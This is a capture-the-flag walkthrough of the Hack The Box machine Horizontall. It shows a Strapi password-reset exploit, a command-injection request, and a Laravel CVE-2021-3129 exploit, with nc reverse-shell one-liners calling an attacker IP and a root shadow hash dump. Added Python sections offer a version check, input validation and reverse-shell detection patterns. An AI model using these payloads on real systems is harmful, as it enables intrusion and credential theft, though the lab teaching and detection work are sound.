Hack-The-Box-walkthrough[horizontall]

Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 28 Aug 2021
IP: 10.10.11.105


Enumeration

Nmap

┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.105
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We add horizontall.htb to our hosts file; you need that entry to enumerate any further.

Webserver

There is nothing interesting on the main site, so we fuzz for vhosts and get a hit on api-prod.horizontall.htb. We add this to our hosts file as well.

┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# gobuster vhost -u horizontall.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --threads 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/30 03:18:39 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]

api-prod.horizontall.htb

We fuzz for subdirectories and find admin.

┌──(root💀kali)-[~/ffuf]
└─# ./ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u http://api-prod.horizontall.htb/FUZZ

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v1.1.0-git
________________________________________________

:: Method : GET
:: URL : http://api-prod.horizontall.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________

admin [Status: 200, Size: 854, Words: 98, Lines: 17]
Admin [Status: 200, Size: 854, Words: 98, Lines: 17]
users [Status: 403, Size: 60, Words: 1, Lines: 1]
reviews [Status: 200, Size: 507, Words: 21, Lines: 1]
. [Status: 200, Size: 413, Words: 76, Lines: 20]
ADMIN [Status: 200, Size: 854, Words: 98, Lines: 17]
Users [Status: 403, Size: 60, Words: 1, Lines: 1]
Reviews [Status: 200, Size: 507, Words: 21, Lines: 1]

Strapi Abuse

Strapi is running on api-prod.horizontall.htb; the admin login is at:

http://api-prod.horizontall.htb/admin/auth/login

There is a password reset vulnerability (CVE-2019-18818), so we abuse it.

https://thatsn0tmysite.wordpress.com/2019/11/15/x05/

Password reset

We can easily guess the email of admin.

┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# curl http://api-prod.horizontall.htb/admin/strapiVersion
{"strapiVersion":"3.0.0-beta.17.4"}

The issue was apparently already fixed (gotta love that opensource-quickness) in version beta-17.5 so the target version is exploitable.

┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# python pass-reset.py admin@horizontall.htb http://api-prod.horizontall.htb password1
[*] Detected version(GET /admin/strapiVersion): 3.0.0-beta.17.4
[*] Sending password reset request...
[*] Setting new password...
[*] Response:
{"jwt":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzEwMTQ0LCJleHAiOjE2MzI5MDIxNDR9.YyA-94yJeHk-7h8U8Oxl-NAvXcs9Tp3YeY7OVN3gx5g","user":{"id":3,"username":"admin","email":"admin@horizontall.htb","blocked":null}}

And we can successfully login.

Strapi RCE

There is a blog post that explains the Strapi exploit: Strapi Framework Vulnerable to Remote Code Execution (CVE-2019-19609).

https://bittherapy.net/post/strapi-framework-remote-code-execution/

To reproduce this issue the app must be using strapi-3.0.0-beta.17.7 or earlier.
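
Both Strapi issues on this page are bounded by a version: the password reset flaw was fixed in beta.17.5, and the plugin-install RCE affects beta.17.7 or earlier. The script below is an added example (not from the walkthrough and not Strapi's own code) that reads the same unauthenticated /admin/strapiVersion endpoint used above, parses the prerelease version string, and reports which of the two CVEs a deployment is still exposed to. The fixed-version table is derived from the text above; the base URL argument is an assumption.

```python
import json
import re
import sys
from urllib.request import urlopen

# Fixed versions taken from the walkthrough text: the password reset flaw
# (CVE-2019-18818) was fixed in 3.0.0-beta.17.5, and the plugin-install RCE
# (CVE-2019-19609) affects 3.0.0-beta.17.7 or earlier, i.e. it is fixed from
# 3.0.0-beta.17.8 on.
FIXED_IN = {
    "CVE-2019-18818": "3.0.0-beta.17.5",
    "CVE-2019-19609": "3.0.0-beta.17.8",
}

# Matches "3.0.0", "3.0.0-beta.17" and "3.0.0-beta.17.4".
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-beta\.(\d+)(?:\.(\d+))?)?$")


def parse_version(version):
    """Turn a Strapi version string into a tuple that compares correctly.

    A final release (no -beta suffix) sorts after every beta of the same
    x.y.z, so its beta number is set to infinity.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Strapi version: {version!r}")
    major, minor, patch, beta, beta_patch = m.groups()
    if beta is None:
        beta_key = (float("inf"), 0)
    else:
        beta_key = (int(beta), int(beta_patch or 0))
    return (int(major), int(minor), int(patch)) + beta_key


def affected(version):
    """Return the CVE ids from FIXED_IN that this version is still exposed to."""
    parsed = parse_version(version)
    return [cve for cve, fixed in FIXED_IN.items() if parsed < parse_version(fixed)]


def check_endpoint(base_url):
    """Fetch /admin/strapiVersion (the unauthenticated endpoint used in the
    walkthrough) and return (version, affected CVEs). base_url is assumed to
    look like http://api-prod.horizontall.htb."""
    with urlopen(base_url.rstrip("/") + "/admin/strapiVersion", timeout=10) as resp:
        version = json.load(resp)["strapiVersion"]
    return version, affected(version)


if __name__ == "__main__":
    ver, cves = check_endpoint(sys.argv[1])
    print(f"strapi {ver}: " + (", ".join(cves) if cves else "not affected by the listed CVEs"))
```

Run it as `python3 strapi_version_check.py http://api-prod.horizontall.htb`. The ordering trick matters: a naive string comparison would put "3.0.0" before "3.0.0-beta.17.8", so the parser maps a final release to an infinite beta number.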

curl -i -s -k -X $'POST' -H $'Host: api-prod.horizontall.htb' -H $'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzEwMTgzLCJleHAiOjE2MzI5MDIxODN9.5OUfoWMixghsJkKGNtiFYXNM-BbojJH4qUUwlwp1wBg' -H $'Content-Type: application/json' -H $'Origin: http://api-prod.horizontall.htb/' -H $'Content-Length: 123' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9001 >/tmp/f)\",\"port\":\"1337\"}' $'http://api-prod.horizontall.htb/admin/plugins/install' --proxy http://127.0.0.1:8080

I pass the request through Burp in case something goes wrong. And we get a shell back as strapi.

POST /admin/plugins/install HTTP/1.1
Host: api-prod.horizontall.htb
User-Agent: curl/7.74.0
Accept: */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzEwMTgzLCJleHAiOjE2MzI5MDIxODN9.5OUfoWMixghsJkKGNtiFYXNM-BbojJH4qUUwlwp1wBg
Content-Type: application/json
Origin: http://api-prod.horizontall.htb/
Content-Length: 127
Connection: close

{"plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9001 >/tmp/f)","port":"1337"}
┌──(root💀kali)-[~]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.11.105.
Ncat: Connection from 10.10.11.105:38344.
/bin/sh: 0: can't access tty; job control turned off
$ di
/bin/sh: 1: di: not found
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$ whoami
strapi
$ ls /home
developer
$ cd /home/developer
$ ls
composer-setup.php
myproject
user.txt
$ cat user.txt
28682f1ff5c4be049cac8bb83103614a
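
The root cause of the RCE above is that the plugin name taken from the JSON body ends up inside a shell command line. The following Python is an added example, not Strapi's code, of the input handling that would have rejected the captured request: a strict pattern and an allowlist for the plugin name, and an argv list handed to subprocess without a shell so the name can never be parsed as shell syntax. The allowlist and the sample request bodies are constructed for this example.

```python
import json
import re
import subprocess

# An npm package name never needs shell metacharacters, so a tight pattern on
# the plugin name alone rejects "documentation && $(...)"-style input.
_PLUGIN_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9._-]{0,63}$")

# Plugins this deployment is allowed to install (constructed for the example).
ALLOWED_PLUGINS = {"documentation", "graphql", "upload", "email"}


def validate_plugin_request(raw_body):
    """Parse the JSON body of POST /admin/plugins/install and return the plugin
    name if it is acceptable; raise ValueError otherwise."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        raise ValueError(f"body is not JSON: {exc}") from None
    name = body.get("plugin") if isinstance(body, dict) else None
    if not isinstance(name, str) or not _PLUGIN_NAME_RE.fullmatch(name):
        raise ValueError(f"rejected plugin name: {name!r}")
    if name not in ALLOWED_PLUGINS:
        raise ValueError(f"plugin not on the allowlist: {name!r}")
    return name


def is_safe_plugin_body(raw_body):
    """Boolean wrapper around validate_plugin_request, handy for logging."""
    try:
        validate_plugin_request(raw_body)
        return True
    except ValueError:
        return False


def build_install_command(name):
    """Return the installer argv. Handing a list to subprocess (no shell=True)
    makes the name an argument, never shell syntax. The vulnerable shape was
    the opposite: interpolating the name into a single shell command string."""
    return ["npm", "install", f"strapi-plugin-{name}"]


def install_plugin(raw_body, runner=subprocess.run):
    """Validate first, then run the installer through `runner` (injectable for tests)."""
    name = validate_plugin_request(raw_body)
    return runner(build_install_command(name), check=True)


# Constructed request bodies with the same shape as the request captured above.
BENIGN_BODY = '{"plugin":"documentation","port":"1337"}'
INJECTED_BODY = '{"plugin":"documentation && $(id)","port":"1337"}'

if __name__ == "__main__":
    for body in (BENIGN_BODY, INJECTED_BODY):
        print(body, "->", "accepted" if is_safe_plugin_body(body) else "rejected")
```

The two layers are independent: the allowlist stops an admin (or a stolen admin JWT, as in this box) from pulling arbitrary packages, and the argv form stops metacharacters from ever reaching a shell even if the pattern were loosened later.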

Privilege Escalation

Strapi's home directory is under /opt, so I created a .ssh directory there and added my SSH public key.

$ pwd
/opt/strapi/.ssh
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali" > authorized_keys

Laravel Exploit

A Laravel application is listening on port 8000, so we forward the port over SSH and exploit it locally.

┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# ssh -i id_rsa -L 8000:127.0.0.1:8000 strapi@10.10.11.105
The authenticity of host '10.10.11.105 (10.10.11.105)' can't be established.
ECDSA key fingerprint is SHA256:rlqcbRwBVk92jqxFV79Tws7plMRzIgEWDMc862X9ViQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.105' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon Aug 30 08:44:01 UTC 2021

System load: 0.01 Processes: 200
Usage of /: 87.6% of 4.85GB Users logged in: 1
Memory usage: 52% IP address for eth0: 10.10.11.105
Swap usage: 0%

=> / is using 87.6% of 4.85GB


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Aug 30 08:36:17 2021 from 10.10.14.5
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$ whoami
strapi

Visit:

http://127.0.0.1:8000/

CVE-2021-3129

https://github.com/nth347/CVE-2021-3129_exploit

┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 "id"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

uid=0(root) gid=0(root) groups=0(root)

[i] Trying to clear logs
[+] Logs cleared

And we have RCE in Laravel as root, so we could stop here and just read root.txt, but a reverse shell is only one more command away.

┌──(root💀kali)-[~/hackthebox/machine/horizontall]
└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9001 >/tmp/f"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[i] There is no output
[i] Trying to clear logs

And we get a root shell.

┌──(root💀kali)-[~]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.11.105.
Ncat: Connection from 10.10.11.105:42580.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cat /root/root.txt
03187202abb3831dbbe697f3644709b6
# cat /etc/shadow | grep root
root:$6$rGxQBZV9$SbzCXDzp1MEx7xxXYuV5voXCy4k9OdyCDbyJcWuETBujfMrpfVtTXjbx82bTNlPK6Ayg8SqKMYgVlYukVOKJz1:18836:0:99999:7:::
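
Both shells in this walkthrough use the same named-pipe reverse shell (mkfifo, /bin/sh -i, nc). The following Python is an added example, not part of the walkthrough, of host-side detection: it scans (user, command line) pairs such as those you would pull from ps or from auditd EXECVE records for that combination, for an outbound nc to an IP and port, and for a service account spawning an interactive shell. The process list and the service-account set are constructed for the example.

```python
import re

# Pieces of the named-pipe reverse shell used twice in this walkthrough: a FIFO
# is created, /bin/sh -i reads from it, and its output is piped to nc. Matching
# the combination rather than any single token keeps false positives low.
_FIFO_SHELL = re.compile(r"mkfifo\s+\S+.*?/bin/(?:ba)?sh\s+-i.*?\bnc\b", re.S)
_NETCAT_TO_IP = re.compile(r"\bnc\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")
_INTERACTIVE_SH = re.compile(r"(?:^|/)(?:ba)?sh\s+-i\b")

# Service accounts that should never own an interactive shell (constructed).
SERVICE_USERS = {"strapi", "www-data", "nginx"}


def analyse_cmdline(user, cmdline):
    """Return a list of findings for one (user, command line) pair; [] if benign."""
    findings = []
    if _FIFO_SHELL.search(cmdline):
        findings.append("named-pipe reverse shell pattern")
    n = _NETCAT_TO_IP.search(cmdline)
    if n:
        findings.append(f"nc outbound to {n.group(1)}:{n.group(2)}")
    if user in SERVICE_USERS and _INTERACTIVE_SH.search(cmdline):
        findings.append(f"interactive shell as service account {user}")
    return findings


# Constructed ps-style (user, command line) pairs, not real output from the box.
# The second line is what the injected plugin name from this page would look
# like once the Strapi process has handed it to sh -c.
SAMPLE_PROCESSES = [
    ("strapi", "node /opt/strapi/myproject/node_modules/.bin/strapi start"),
    ("strapi", "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9001 >/tmp/f"),
    ("root", "/usr/sbin/sshd -D"),
    ("developer", "php artisan serve --host=127.0.0.1 --port=8000"),
]


def scan(processes=SAMPLE_PROCESSES):
    """Return (user, cmdline, findings) for every process with at least one finding."""
    results = []
    for user, cmd in processes:
        findings = analyse_cmdline(user, cmd)
        if findings:
            results.append((user, cmd, findings))
    return results


if __name__ == "__main__":
    for user, cmd, findings in scan():
        print(f"[{user}] {cmd}")
        for f in findings:
            print(f"    - {f}")
```

In a real deployment the input would come from `ps -eo user,args` or from auditd EXECVE lines rather than the constructed list; the "service account spawning sh -i" rule is the one that generalises, because it fires regardless of which reverse-shell one-liner was used.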

Summary of knowledge

  • basic information gathering
  • Strapi password reset vulnerability (CVE-2019-18818)
  • Strapi Framework Remote Code Execution (CVE-2019-19609)
  • Privilege Escalation through CVE-2021-3129 exploit

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more……